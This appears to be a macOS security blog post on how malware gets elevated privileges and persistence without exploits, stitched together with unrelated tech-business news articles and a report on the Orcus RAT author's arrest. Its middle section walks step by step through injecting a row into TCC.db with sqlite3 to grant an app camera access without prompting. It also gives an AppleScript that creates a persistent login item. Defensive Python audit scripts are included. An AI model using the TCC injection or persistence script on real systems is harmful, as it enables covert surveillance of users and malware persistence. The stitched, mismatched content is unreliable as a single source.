Privilege Escalation | macOS Malware & The Path to Root Part 2

Among security researchers and bug bounty hunters, obtaining unauthorized elevated privileges – privilege escalation – is widely held as the hacker’s holy grail; an achievement that can be paved with gold as bounty programs, private zero day hoarders and pwn2own-style competitions reward such exploits with handsome amounts of hard cash. As we saw in Part I, Apple’s regular product security updates are frequently littered with a variety of arbitrary code execution and privilege escalation vulnerabilities found by researchers both public and private. Despite this, the vulnerabilities and exploits discovered by researchers are not widely used in the wild by macOS threat actors, and that is largely because they have found other ways to the same end. In this post, we continue our look at the role of privilege escalation on macOS from the point of view of malware developers and how they take a different path.

image privilege escalation part 2

Where’s the Harm in Asking?

Much of the commodity malware and adware seen on macOS doesn’t avail itself of the kind of exploits that lead to privilege escalation that we looked at last time. That’s not only because the exploits typically have a limited shelf life. It’s also not time well-spent. Most users, incredibly but not surprisingly, will happily give elevated privileges if you only ask! 

This direct route to elevation is partly engendered by the fact that Mac users are conditioned by both frequency and repetition to seeing authorization requests when they install or move applications, move or copy files or programs from one location to another outside of their home folders, and now – more than ever – to grant applications access rights to many common system services such as Contacts, Calendars, Photos and such like, something we’ll discuss below in detail.

Examples of “ask and hope” are easy to find among macOS commodity adware and malware; in fact, they are the norm, precisely because users are easily socially engineered into installing some program or opening some file that they believe is going to be useful, informative or otherwise beneficial to what they are currently doing. 

Malware developers, PUPs/PUAs and adware make regular use of the built-in Installer.app and .pkg file format, just like legitimate apps. They know that most users will click through the installer wizard and never stop to check the installer.log to see what is really going on, let alone use a tool like Suspicious Package to inspect what the package contains.

image of suspicious package

Below is just one example of a common malicious installer.

image of PUP ADWARE installer
image of installer log

Genuine uses of the API that requests elevated permissions do not expose the password to the calling process, but malware authors typically just fake the dialog box and capture the password in plain text, which is easy to do.

image fake installer dialog box

It’s also fairly simple to use a bit of AppleScript to spoof a user into supplying a password with a pretty genuine-looking dialog box that even imports legitimate native icons for added authenticity:

image spoof password
image of spoof script

And sometimes, even asking for root isn’t required. Famously, in the initial public release of macOS 10.13 High Sierra, an error allowed anyone to unlock a protected System Preferences pane simply with the username root and an empty password (the flaw was fixed in macOS 10.13.1)!

Abusing Dialog Alerts – Can Click, Will Click

Legitimate requests for privileges or access to protected resources have always been highly uninformative, conditioning users to either take on trust that the process is benign or risk losing some desired functionality. 

Aware of this, Apple have recently made changes to Security & Privacy preferences, adding the requirement that for notarized apps, developers must provide an informative description to be displayed in the request dialog if they intend to access these protected resources.

While the intention is good, it’s unlikely that this extra “hoop” for legitimate developers to jump through will make any difference to malware authors. First, there’s no check on what information the developer provides, only that they provide some kind of description string. Second, even Apple’s own description strings are hardly any less confusing. For example, what could it possibly mean to most users to say one application will be able to access documents and data in Terminal.app? The Terminal app isn’t typically thought of as a location for storing documents and data, so that description is at best confusing to users. Likely, we suspect it means one app will have access to documents and data within the sandbox container of the other app, but even if correct that is hardly helpful. What the implications of that are is left entirely for the user to find out the hard way: by clicking one of the buttons and finding out.

image of terminal app dialog

The result is that the required description string is unlikely to be much help to users in judging whether the action is one they want to take or not. Thirdly, and perhaps anecdotally, most people agree that such messages, even when presented with useful text, are rarely even read before the click or button press has been made. Double that effect when the messages come thick and fast and are perceived as a hindrance to productivity.

Who Needs Sudo When The User is Admin?

Another reason why attackers on macOS don’t worry unduly about elevating privileges to root is that by far and away the majority of macOS users are running as the default user that was set up when they first bought or were given their Mac. That default user is, of course, an admin user. The id command will quickly tell a process what access its user has.

image of id utility

A process generally has the privileges of the user who launches it, so clearly when the user is admin – as most are – that gives the process a lot of power to make changes, launch other processes and access resources.


For example, until Mojave, any user launched process could – without requesting any further interaction from the user – read the user’s email database, including encrypted emails, exfiltrate the browser’s entire browsing history and much more besides. These have supposedly been locked down, but various bypasses have already been revealed (see here and here, for example) and they are largely null and void in any case as soon as a user adds the Terminal to Full Disk Access, something that anyone who uses the Terminal is almost certainly going to do.

Any Hack Dropbox Can Do, Zoom Can Do Better

Which brings us to ways that malware authors can access protected resources even without asking. To tell this story, we need to pivot away from malicious developers to legitimate ones for a moment. 

Back in 2016, in my Revealing Dropbox’s dirty little security hack and a subsequent post, I exposed how Dropbox hacks System Preferences to forcibly insert itself into the Accessibility preferences pane giving itself permission to take control of the User Interface, regardless of what choices the user made in System Preferences.

image of dropbox hack

This hack was itself seen in various adware, PUP/PUAs and malware exploit kits. Following a lot of exposure on hacker news and elsewhere, Apple took exception to this, and with the release of macOS Sierra a few months later locked down the TCC database that acts as the backing store for those rights. 

With Mojave and Catalina, Apple added further controls to user privacy, again backed by the TCC SQLite database, including restricting access to the system camera and microphone. 

Beginning in macOS Mojave, users have to consent before an app can access the camera or microphone. And then macOS Catalina further requires consent to record the contents of your screen or the keys that you type on your keyboard.

Importantly, while Apple have made it possible to pre-approve some of the privacy preferences either at the user level or by Mac Admins using MDM configuration profiles, they stressed in WWDC 2019 that access to the camera and microphone could only be pre-denied. Access to these resources could only be acquired at “time of use” through user approval: clicking an ‘Allow’ or ‘Deny’ button in a dialog that pops when the resource is requested by an application.

Enter Zoom into the story. You may remember Zoom were recently in the news regarding using a hidden web server, which, it turned out, could easily be hijacked by malicious actors to enable a user’s camera without their permission. It seems the controversy has not made the company any more shy about abusing loopholes in Apple’s security, albeit in a bid to provide a better experience for its users. Last week, Zoom hit the news again as a document they published themselves shows they had found and implemented another simple bypass to the Camera and Microphone permissions.

Credits here go to GitHub user bp88 who developed an entire script for Jamf Pro users wanting to emulate the same effect, but let’s walk through it step by step to see how it works. Let’s use the Calculator.app, clearly something that does not require access to the Camera, for this demo.

First we have to gather a little information about the app we want to sneak into Privacy preferences, including its bundle identifier and code signature requirements.

$ plutil -p /System/Applications/Calculator.app/Contents/Info.plist | grep -i bundleidentifier

This returns com.apple.calculator.

We also need its code signing requirements in hex form. To get those, we use codesign to extract the requirements.

$ codesign -d -r- /System/Applications/Calculator.app

Which returns the following:

image of codesign utility

We only want the part after designated  =>. We echo that into the csreq util, which will give us a binary output that we’ll save to a temp file.

$ echo 'identifier "com.apple.calculator" and anchor apple' | csreq -r- -b /tmp/req.bin

Using xxd and tr, we take the binary file and convert it into the hex “blob” that the TCC.db expects.

$ xxd -p /tmp/req.bin | tr -d '\n'

We’ll wrap that blob inside X' ' as required by the database syntax.

X'fade0c000000003000000001000000060000000200000014636f6d2e6170706c652e63616c63756c61746f7200000003'

Finally we need a time stamp, which we can grab with 

$ date +"%s"

All we need to do now is construct our sqlite command based on the database’s schema and execute it.

$ sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db "INSERT INTO access (service,client,client_type,allowed,prompt_count,csreq,last_modified) VALUES('kTCCServiceCamera', 'com.apple.calculator', '0', '1', '1', X'fade0c000000003000000001000000060000000200000014636f6d2e6170706c652e63616c63756c61746f7200000003', 1573637690)"

gif image of zoom hack

While this is more of a horizontal privilege escalation – meaning, the level of rights remains the same, but the hack allows access to other resources that would normally require further user approval – it nevertheless demonstrates how macOS’s built-in security can easily be bypassed at the user level and without resorting to exploiting low-level vulnerabilities. Expect to see this hack used in the wild by RATs and other malware interested in hijacking the camera and microphone resources. 
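For defenders reviewing a TCC.db collected from a Mac, the csreq blob can be read back into the requirement text it encodes. The following is an added example, not code from the original post or from bp88's script: it decodes the blob shown above and lists camera and microphone grants with anything that needs a second look. The table is a constructed in-memory copy with only the columns named in the INSERT statement, the com.example rows are made up, and the decoder handles only the opcodes that blob uses (anything else is reported as undecoded).

```python
import sqlite3
import struct
from datetime import datetime, timezone

CSREQ_MAGIC = 0xFADE0C00                    # first four bytes of the blob above
OP_IDENT, OP_APPLE_ANCHOR, OP_AND = 2, 3, 6  # the only opcodes that blob uses
WATCHED = ("kTCCServiceCamera", "kTCCServiceMicrophone")

# The csreq value from the walk-through, plus a constructed one that encodes
# only: identifier "com.example.app"
PAGE_BLOB = bytes.fromhex(
    "fade0c000000003000000001000000060000000200000014"
    "636f6d2e6170706c652e63616c63756c61746f7200000003")
OTHER_BLOB = bytes.fromhex(
    "fade0c000000002400000001000000020000000f"
    "636f6d2e6578616d706c652e61707000")


def _u32(blob, pos):
    """Read one big-endian 32-bit word, refusing to run off the end."""
    if pos + 4 > len(blob):
        raise ValueError("truncated requirement blob")
    return struct.unpack_from(">I", blob, pos)[0]


def _expr(blob, pos):
    """Decode one expression; return (text, identifiers named, next offset)."""
    op, pos = _u32(blob, pos), pos + 4
    if op == OP_IDENT:
        size, pos = _u32(blob, pos), pos + 4
        if pos + size > len(blob):
            raise ValueError("identifier runs past end of blob")
        ident = blob[pos:pos + size].decode("utf-8")
        # Strings are padded to a four-byte boundary.
        return f'identifier "{ident}"', [ident], pos + ((size + 3) & ~3)
    if op == OP_APPLE_ANCHOR:
        return "anchor apple", [], pos
    if op == OP_AND:
        left, left_ids, pos = _expr(blob, pos)
        right, right_ids, pos = _expr(blob, pos)
        return f"{left} and {right}", left_ids + right_ids, pos
    raise ValueError(f"unsupported opcode {op:#x}")


def decode_csreq(blob):
    """Return (requirement text, identifiers) for a binary requirement blob."""
    if len(blob) < 12 or _u32(blob, 0) != CSREQ_MAGIC:
        raise ValueError("not a requirement blob")
    if _u32(blob, 4) != len(blob):
        raise ValueError("length field does not match blob size")
    text, idents, end = _expr(blob, 12)      # word at offset 8 is the kind field
    if end != len(blob):
        raise ValueError("trailing bytes after expression")
    return text, idents


def audit_tcc(conn):
    """List allowed camera/microphone rows with decoded requirement and flags."""
    rows = conn.execute(
        "SELECT service, client, csreq, last_modified FROM access "
        "WHERE allowed = 1 AND service IN (?, ?) ORDER BY last_modified", WATCHED)
    report = []
    for service, client, csreq, modified in rows:
        requirement, flags = None, []
        if csreq is None:
            flags.append("no code requirement stored")
        else:
            try:
                requirement, idents = decode_csreq(bytes(csreq))
                if client not in idents:
                    flags.append("requirement does not name the client")
            except ValueError as exc:
                flags.append(f"undecoded requirement: {exc}")
        when = datetime.fromtimestamp(modified, tz=timezone.utc)
        report.append({"service": service, "client": client,
                       "requirement": requirement, "flags": flags,
                       "modified": when.strftime("%Y-%m-%dT%H:%M:%SZ")})
    return report


def sample_db():
    """Constructed stand-in for TCC.db (columns taken from the INSERT above)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE access (service TEXT, client TEXT, client_type "
                 "INTEGER, allowed INTEGER, prompt_count INTEGER, csreq BLOB, "
                 "last_modified INTEGER)")
    conn.executemany("INSERT INTO access VALUES (?, ?, 0, ?, 1, ?, ?)", [
        ("kTCCServiceCamera", "com.apple.calculator", 1, PAGE_BLOB, 1573637690),
        ("kTCCServiceMicrophone", "com.example.other", 1, OTHER_BLOB, 1573637700),
        ("kTCCServiceCamera", "com.example.nocsreq", 1, None, 1573637710),
        ("kTCCServiceCamera", "com.example.denied", 0, None, 1573637720),
    ])
    return conn


if __name__ == "__main__":
    for entry in audit_tcc(sample_db()):
        print(entry)
```

During triage, call audit_tcc with a connection opened on a copy of the collected TCC.db and compare the modification times against when the user recalls approving each app.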

Persistence Doesn’t Require Elevated Privileges

If you’ve ever logged in to a Mac only to unexpectedly find that some unwanted app launches itself and slows down the login process, you’ve just experienced the fact that apps don’t need permission or authentication to start up at user login time. With persistence being one of the major objectives of all malware, this is a feature that is widely abused.

There are several ways that apps can ensure they execute on login and before the user takes control of the Desktop, none of which require the application to obtain permission. 

First of all, an app can simply install itself into the Login Items list in System Preferences. Although use of this kind of persistence mechanism is formally deprecated, it’s still widely used and can even be done with a simple AppleScript.

tell application "System Events"
	name of every login item
	if (login item "Persistent App" exists) is false then
		tell application process "Persistent App" to set aPath to POSIX path of its application file as string
		make new login item at end of login items with properties {path:aPath, hidden:false, kind:"Application", name:"Persistent App"}
	end if
end tell


Second, the mechanism that is now officially recommended by Apple to replace deprecated Login Items actually makes it more difficult for users to review and manage. Login Items are now hidden within each application’s own bundle and are entirely managed within the application itself. Apple kindly point out to developers that the older API, unlike the new preferred mechanism, exposes their login item to user interference.

image of login item documentation

As we’ve mentioned before it is possible to enumerate which items are using Login Items, but this requires either writing custom code or running a script, which I’ve previously shared here.

Another route to persistence that does not require the malware authors to engage in privilege escalation techniques is to simply write a LaunchAgent to the user’s Library folder. The LaunchAgents folder does not require permissions to write to, and is by far and away the most prevalent persistence method used on the Mac by malware. That’s largely because most users have no idea that this folder exists – not helped by the fact that Apple chose to hide it by default from 10.7 onwards – and most wouldn’t know what was safe or dangerous to do with it even if they did.

Despite that, given the explosion in adware over the last couple of years, the role of LaunchAgents has started to attract a little more attention as adware infected users turn to community forums seeking help. That in turn has led to a small but rising use of the old cron technologies, which even fewer modern users are aware of. These still function reliably on all versions of macOS right up to and including macOS 10.15 Catalina.

Notice how in this example the malware explicitly calls sudo which throws a permission request to the user as they log in, without explanation other than “confup wants to make changes”. Given the recent rash of infections we’re seeing of this particular item, it’s clearly successful.

image cron reboot
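Because these user-level persistence locations need no authorization to write to, they are worth reviewing routinely. The following added example (not from the original post) scans a LaunchAgents folder and a crontab listing for entries that deserve a closer look, including the @reboot plus sudo pattern described above. The heuristics, the sample property lists and the paths are constructed for illustration; only the name confup comes from the post.

```python
import plistlib
import tempfile
from pathlib import Path, PurePosixPath

# Illustrative heuristics (assumptions for this example, not a complete rule set).
SCRIPT_HOSTS = {"sh", "bash", "zsh", "osascript", "python", "python3", "curl"}
ODD_ROOTS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")


def path_reasons(token):
    """Reasons one absolute path inside a command line looks out of place."""
    reasons = []
    if token.startswith(ODD_ROOTS):
        reasons.append(f"runs from a shared or temporary location: {token}")
    if any(part.startswith(".") for part in PurePosixPath(token).parts[1:]):
        reasons.append(f"hidden path component: {token}")
    return reasons


def command_reasons(argv):
    """Reasons a command (as an argument list) deserves a closer look."""
    reasons = []
    if argv and PurePosixPath(argv[0]).name in SCRIPT_HOSTS:
        reasons.append(f"runs through {PurePosixPath(argv[0]).name}")
    for token in " ".join(argv).split():
        if token == "sudo":
            reasons.append("invokes sudo")
        elif token.startswith("/"):
            reasons.extend(path_reasons(token))
    return reasons


def scan_launch_agents(directory):
    """Map plist file name -> reasons, for every job with at least one reason."""
    findings = {}
    for plist_path in sorted(Path(directory).glob("*.plist")):
        try:
            with plist_path.open("rb") as handle:
                job = plistlib.load(handle)
            argv = job.get("ProgramArguments") or [job.get("Program", "")]
            reasons = command_reasons([str(arg) for arg in argv])
        except Exception:  # malformed file or unexpected top-level type
            reasons = ["unparseable plist"]
        if reasons:
            findings[plist_path.name] = reasons
    return findings


def review_crontab(text):
    """Return (line, reasons) for crontab lines that deserve a closer look."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        if fields[0] == "@reboot":
            reasons = ["runs at every boot (@reboot)"] + command_reasons(fields[1:])
        else:
            # Five schedule fields precede the command; variable assignments
            # such as PATH=... have no command part and produce no reasons.
            reasons = command_reasons(fields[5:])
        if reasons:
            findings.append((line, reasons))
    return findings


def demo():
    """Build constructed sample data in a temporary folder and scan it."""
    samples = {
        "com.example.updater.plist": {
            "Label": "com.example.updater",
            "Program": "/Applications/Example.app/Contents/MacOS/updater"},
        "com.constructed.confup.plist": {
            "Label": "com.constructed.confup", "RunAtLoad": True,
            "ProgramArguments": ["/bin/sh", "-c", "/Users/Shared/.confup/confup"]},
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, job in samples.items():
            (Path(tmp) / name).write_bytes(plistlib.dumps(job))
        (Path(tmp) / "broken.plist").write_bytes(b"not a property list")
        agents = scan_launch_agents(tmp)
    crontab = ("PATH=/usr/bin:/bin\n"
               "*/5 * * * * /usr/bin/true\n"
               "@reboot sudo /Users/Shared/.confup/confup\n")
    return agents, review_crontab(crontab)


if __name__ == "__main__":
    agent_findings, cron_findings = demo()
    for name, reasons in agent_findings.items():
        print(name, reasons)
    for line, reasons in cron_findings:
        print(line, reasons)
```

On a real system, pass scan_launch_agents the path of the user's Library/LaunchAgents folder and review_crontab the output of crontab -l.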

Conclusion

Despite the active and perhaps competitive race among researchers to find the latest path to root, it is rare to see the kind of privilege escalation exploits they develop being actively used in the wild by attackers. What accounts for this disjunction between research and practice is the fact that there are multiple ways for malware authors to achieve their objectives with simpler and more durable techniques. Sometimes, as we’ve seen, privilege escalation isn’t even required and where it is, social engineering or just a plain ask will often do the trick. While unpatched zero days will always be in the armoury of advanced attackers, for the majority of crimeware, they are rarely needed.



Mirantis acquires Docker Enterprise

Mirantis today announced that it has acquired Docker’s Enterprise business and team. Docker Enterprise was very much the heart of Docker’s product lineup, so this sale leaves Docker as a shell of its former, high-flying unicorn self. Docker itself, which installed a new CEO earlier this year, says it will continue to focus on tools that will advance developers’ workflows. Mirantis will keep the Docker Enterprise brand alive, though, which will surely not create any confusion.

With this deal, Mirantis is acquiring Docker Enterprise Technology Platform and all associated IP: Docker Enterprise Engine, Docker Trusted Registry, Docker Unified Control Plane and Docker CLI. It will also inherit all Docker Enterprise customers and contracts, as well as its strategic technology alliances and partner programs. Docker and Mirantis say they will both continue to work on the Docker platform’s open-source pieces.

The companies did not disclose the price of the acquisition, but it’s surely nowhere near Docker’s valuation during any of its last funding rounds. Indeed, it’s no secret that Docker’s fortunes changed quite a bit over the years, from leading the container revolution to becoming somewhat of an afterthought after Google open-sourced Kubernetes and the rest of the industry coalesced around it. It still had a healthy enterprise business, though, with plenty of large customers among the large enterprises. The company says about a third of Fortune 100 and a fifth of Global 500 companies use Docker Enterprise, which is a statistic most companies would love to be able to highlight — and which makes this sale a bit puzzling from Docker’s side, unless the company assumed that few of these customers were going to continue to bet on its technology.

Update: for reasons only known to Docker’s communications team, we weren’t told about this beforehand, but the company also today announced that it has raised a $35 million funding round from Benchmark. This doesn’t change the overall gist of the story below, but it does highlight the company’s new direction.

Here is what Docker itself had to say. “Docker is ushering in a new era with a return to our roots by focusing on advancing developers’ workflows when building, sharing and running modern applications. As part of this refocus, Mirantis announced it has acquired the Docker Enterprise platform business,” Docker said in a statement when asked about this change. “Moving forward, we will expand Docker Desktop and Docker Hub’s roles in the developer workflow for modern apps. Specifically, we are investing in expanding our cloud services to enable developers to quickly discover technologies for use when building applications, to easily share these apps with teammates and the community, and to run apps frictionlessly on any Kubernetes endpoint, whether locally or in the cloud.”

Mirantis itself, too, went through its ups and downs. While it started as a well-funded OpenStack distribution, today’s Mirantis focuses on offering a Kubernetes-centric on-premises cloud platform and application delivery. As the company’s CEO Adrian Ionel told me ahead of today’s announcement, today is possibly the most important day for the company.

So what will Mirantis do with Docker Enterprise? “Docker Enterprise is absolutely aligned and an accelerator of the direction that we were already on,” Ionel told me. “We were very much moving towards Kubernetes and containers aimed at multi-cloud and hybrid and edge use cases, with these goals to deliver a consistent experience to developers on any infrastructure anywhere — public clouds, hybrid clouds, multi-cloud and edge use cases — and make it very easy, on-demand, and remove any operational concerns or burdens for developers or infrastructure owners.”

Mirantis previously had about 450 employees. With this acquisition, it gains another 300 former Docker employees that it needs to integrate into its organization. Docker’s field marketing and sales teams will remain separate for some time, though, Ionel said, before they will be integrated. “Our most important goal is to create no disruptions for customers,” he noted. “So we’ll maintain an excellent customer experience, while at the same time bringing the teams together.”

This also means that for current Docker Enterprise customers, nothing will change in the near future. Mirantis says that it will accelerate the development of the product and merge its Kubernetes and lifecycle management technology into it. Over time, it will also offer a managed services solution for Docker Enterprise.

While there is already some overlap between Mirantis’ and Docker Enterprise’s customer base, Mirantis will pick up about 700 new enterprise customers with this acquisition.

With this, Ionel argues, Mirantis is positioned to go up against large players like VMware and IBM/Red Hat. “We are the one real cloud-native player with meaningful scale to provide an alternative to them without lock-in into a legacy or existing technology stack.”

While this is clearly a day the Mirantis team is celebrating, it’s hard not to look at this as the end of an era for Docker, too. The company says it will share more about its future plans today, but didn’t make any spokespeople available ahead of this announcement.

Atlassian expands Jira Service Desk beyond IT teams

Atlassian today announced a set of new templates and workflows for Jira Service Desk that were purpose-built for HR, legal and facilities teams. Service Desk started six years ago as a version of Jira that was mostly meant for IT departments. Atlassian, however, found that other teams inside the companies that adopted it started to use it as well, including various teams at Twitter and Airbnb, for example. With today’s update, it’s now making it easier for these teams, at least in legal, HR and facilities, to get started with Jira Service Desk without having to customize the product themselves.

“Over the last six years, one of the observations that we’ve made was that we need to provide really good services — the idea that we can provide great services to employees is really something that is really on the rise,” said Edwin Wong, the head of the company’s IT products. “I think in the past, maybe we were a bit more forgiving in terms of what employees expected from services departments. But today you’re just so used to great experiences in your consumer life and when you come to work, you expect the same.”

But lots of service teams, he argues, didn’t have the tools to provide this experience, yet they were looking for tools to streamline their workflows (think onboarding for HR teams, for example) and to move from manual processes to something more automated and modern. Jira was already flexible enough to allow them to do this, but the new set of templates now codifies these processes for them.

Wong stressed this isn’t just about tracking but also managing work across teams and providing them a more centralized hub for information. “One of the big challenges that we’ve seen from many of the customers that we’ve spoken to is the challenge of just figuring out where to go when you want something,” he said. “When I have a new employee, where do I go to ask for a new laptop? Is that the same process as telling my facilities teams that perhaps there is an issue with a bathroom?”

Atlassian is starting with these three templates because that’s where it saw the most immediate need. Over time, I’m sure we’ll see the company get into other verticals as well.

Freshworks raises $150M Series H on $3.5B valuation

Freshworks, a company that makes a variety of business software tools, from CRM to help-desk software, announced a $150 million Series H investment today from Sequoia Capital, CapitalG (formerly Google Capital) and Accel on a hefty $3.5 billion valuation. The late-stage startup has raised almost $400 million, according to Crunchbase data.

The company has been building an enterprise SaaS platform to give customers a set of integrated business tools, but CEO and co-founder Girish Mathrubootham says they will be investing part of this money in R&D to keep building out the platform.

To that end, the company also announced today a new unified data platform called the “Customer-for-Life Cloud” that runs across all of its tools. “We are actually investing in really bringing all of this together to create the “Customer-for-Life Cloud,” which is how you take marketing, sales, support and customer success — all of the aspects of a customer across the entire life cycle journey and bring them to a common data model where a business that is using Freshworks can see the entire life cycle of the customer,” Mathrubootham explained.

While Mathrubootham was not ready to commit to an IPO, he said they are in the process of hiring a CFO and are looking ahead to one day becoming a public company. “We don’t have a definite timeline. We want to go public at the right time. We are making sure that as a company that we are ready with the right processes and teams and predictability in the business,” he said.

In addition, he says he will continue to look for good acquisition targets, and having this money in the bank will help the company fill in gaps in the product set should the right opportunity arise. “We don’t generally acquire revenue, but we are looking for good technology teams both in terms of talent, as well as technology that would help give us a jumpstart in terms of go-to-market.” It hasn’t been afraid to target small companies in the past, having acquired 12 already.

Freshworks, which launched in 2010, has almost 2,500 employees, a number that’s sure to go up with this new investment. It has 250,000 customers worldwide, including almost 40,000 paying customers. These include Bridgestone Tires, Honda, Hugo Boss, Toshiba and Cisco.

AWS, Salesforce join forces with Linux Foundation on Cloud Information Model

Last year, Adobe, SAP and Microsoft came together and formed the Open Data Initiative. Not to be outdone, this week, AWS, Salesforce and Genesys, in partnership with The Linux Foundation, announced the Cloud Information Model.

The two competing data models have a lot in common. They are both about bringing together data and applying a common open model to it. The idea is to allow for data interoperability across products in the partnership without a lot of heavy lifting, a common problem for users of these big companies’ software.

Jim Zemlin, executive director at The Linux Foundation, says this project provides a neutral home for the Cloud Information model, where a community can work on the problem. “This allows for anyone across the community to collaborate and provide contributions under a central governance model. It paves the way for full community-wide engagement in data interoperability efforts and standards development, while rapidly increasing adoption rate of the community,” Zemlin explained in a statement.

Each of the companies in the initial partnership is using the model in different ways. AWS will use it in conjunction with its AWS Lake Formation tool to help customers move, catalog, store and clean data from a variety of data sources, while Genesys customers can use its cloud and AI products to communicate across a variety of channels.

Patrick Stokes from Salesforce says his company is using the Cloud Information Model as the underlying data model for his company’s Customer 360 platform of products. “We’re super excited to announce that we’ve joined together with a few partners — AWS, Genesys and The Linux Foundation — to actually open-source that data model,” Stokes told TechCrunch.

Of course, now we have two competing “open” data models, and it’s going to create some friction until the two competing projects find a way to come together. The fact is that many companies use tools from each of these companies, and if there continues to be these competing approaches, it’s going to defeat the purpose of creating these initiatives in the first place.

As Satya Nadella said in 2015, “It is incumbent upon us, especially those of us who are platform vendors to partner broadly to solve real pain points our customers have.” If that’s the case, having competing models is not really achieving that.

Messaging app Wire confirms $8.2M raise, responds to privacy concerns after moving holding company to the US

Big changes are afoot for Wire, an enterprise-focused end-to-end encrypted messaging app and service that advertises itself as “the most secure collaboration platform”. In February, Wire quietly raised $8.2 million from Morpheus Ventures and others, we’ve confirmed — the first funding amount it has ever disclosed — and alongside that external financing, it moved its holding company in the same month to the US from Luxembourg, a switch that Wire’s CEO Morten Brogger described in an interview as “simple and pragmatic.”

He also said that Wire is planning to introduce a freemium tier to its existing consumer service — which itself has half a million users — while working on a larger round of funding to fuel more growth of its enterprise business — a key reason for moving to the US, he added: There is more money to be raised there.

“We knew we needed this funding and additional to support continued growth. We made the decision that at some point in time it will be easier to get funding in North America, where there’s six times the amount of venture capital,” he said.

While Wire has moved its holding company to the US, it is keeping the rest of its operations as is. Customers are licensed and serviced from Wire Switzerland; the software development team is in Berlin, Germany; and hosting remains in Europe.

The news of Wire’s US move and the basics of its February funding — sans value, date or backers — came out this week via a blog post that raises questions about whether a company that trades on the idea of data privacy should itself be more transparent about its activities.

Specifically, the changes to Wire’s financing and legal structure were only communicated to users when news started to leak out, which brings up questions not just about transparency, but about the state of Wire’s privacy policy, given the company’s holding company now being on US soil.

It was an issue picked up and amplified by NSA whistleblower Edward Snowden. Via Twitter, he described the move to the US as “not appropriate for a company claiming to provide a secure messenger — claims a large number of human rights defenders relied on.”

The key question is whether Wire’s shift to the US puts users’ data at risk — a question that Brogger claims is straightforward to answer: “We are in Switzerland, which has the best privacy laws in the world” — it’s subject to Europe’s General Data Protection Regulation framework (GDPR) on top of its own local laws — “and Wire now belongs to a new group holding, but there is no change in control.”

In its blog post published in the wake of blowback from privacy advocates, Wire also claims it “stands by its mission to best protect communication data with state-of-the-art technology and practice” — listing several items in its defence:

  • All source code has been and will be available for inspection on GitHub (github.com/wireapp).
  • All communication through Wire is secured with end-to-end encryption — messages, conference calls, files. The decryption keys are only stored on user devices, not on our servers. It also gives companies the option to deploy their own instances of Wire in their own data centers.
  • Wire has started working on a federated protocol to connect on-premise installations and make messaging and collaboration more ubiquitous.
  • Wire believes that data protection is best achieved through state-of-the-art encryption and continues to innovate in that space with Messaging Layer Security (MLS).

But where data privacy and US law are concerned, it’s complicated. Snowden famously leaked scores of classified documents disclosing the extent of US government mass surveillance programs in 2013, including how data-harvesting was embedded in US-based messaging and technology platforms.

Six years on, the political and legal ramifications of that disclosure are still playing out — with a key judgement pending from Europe’s top court which could yet unseat the current data transfer arrangement between the EU and the US.

Privacy versus security

Wire launched at a time when interest in messaging apps was at a high watermark. The company made its debut in the middle of February 2014, and it was only one week later that Facebook acquired WhatsApp for the princely sum of $19 billion.

We described Wire’s primary selling point at the time as a “reimagining of how a communications tool like Skype should operate had it been built today” rather than in 2003. That meant encryption and privacy protection, but also better audio tools and file compression and more.

It was a pitch that seemed especially compelling considering the background of the company. Skype co-founder Janus Friis and funds connected to him were the startup’s first backers (and they remain the largest shareholders); Wire was co-founded in by Skype alums Jonathan Christensen and Alan Duric (no longer with the company); and even new investor Morpheus has Skype roots.

Yet even with that Skype pedigree, the strategy faced a big challenge.

“The consumer messaging market is lost to the Facebooks of the world, which dominate it,” Brogger said today. “However, we made a clear insight, which is the core strength of Wire: security and privacy.”

That, combined with the trend around the consumerization of IT that’s brought new tools to business users, is what led Wire to the enterprise market in 2017 — a shift that’s seen it pick up a number of big names among its 700 enterprise customers, including Fortum, Aon, EY and SoftBank Robotics.

But fast forward to today, and it seems that even as security and privacy are two sides of the same coin, it may not be so simple when deciding what to optimise in terms of features and future development, which is part of the question now and what critics are concerned with.

“Wire was always for profit and planned to follow the typical venture backed route of raising rounds to accelerate growth,” one source familiar with the company told us. “However, it took time to find its niche (B2B, enterprise secure comms).

“It needed money to keep the operations going and growing. [But] the new CEO, who joined late 2017, didn’t really care about the free users, and the way I read it now, the transformation is complete: ‘If Wire works for you, fine, but we don’t really care about what you think about our ownership or funding structure as our corporate clients care about security, not about privacy.’”

And that is the message you get from Brogger, too, who describes individual consumers as “not part of our strategy”, but also not entirely removed from it, either, as the focus shifts to enterprises and their security needs.

Brogger said there are still half a million individuals on the platform, and they will come up with ways to continue to serve them under the same privacy policies and with the same kind of service as the enterprise users. “We want to give them all the same features with no limits,” he added. “We are looking to switch it into a freemium model.”

On the other side, “We are having a lot of inbound requests on how Wire can replace Skype for Business,” he said. “We are the only one who can do that with our level of security. It’s become a very interesting journey and we are super excited.”

Part of the company’s push into enterprise has also seen it make a number of hires. This has included bringing in two former Huddle C-suite execs, Brogger as CEO and Rasmus Holst as chief revenue officer — a bench that Wire expanded this week with three new hires from three other B2B businesses: a VP of EMEA sales from New Relic, a VP of finance from Contentful; and a VP of Americas sales from Xeebi.

Such growth comes with a price-tag attached to it, clearly. Which is why Wire is opening itself to more funding and more exposure in the US, but also more scrutiny and questions from those who counted on its services before the change.

Brogger said inbound interest has been strong and he expects the startup’s next round to close in the next two to three months.

Orcus RAT Author Charged in Malware Scheme

In July 2016, KrebsOnSecurity published a story identifying a Toronto man as the author of the Orcus RAT, a software product that’s been marketed on underground forums and used in countless malware attacks since its creation in 2015. This week, Canadian authorities criminally charged him with orchestrating an international malware scheme.

An advertisement for Orcus RAT.

The accused, 36-year-old John “Armada” Revesz, has maintained that Orcus is a legitimate “Remote Administration Tool” aimed at helping system administrators remotely manage their computers, and that he’s not responsible for how licensed customers use his product.

In my 2016 piece, however, several sources noted that Armada and his team were marketing it more like a Remote Access Trojan, providing ongoing technical support and help to customers who’d purchased Orcus but were having trouble figuring out how to infect new machines or hide their activities online.

Follow-up reporting revealed that the list of features and plugins advertised for Orcus includes functionality that goes significantly beyond what one might see in a traditional remote administration tool, such as DDoS-for-hire capabilities, and the ability to disable the light indicator on webcams so as not to alert the target that the RAT is active.

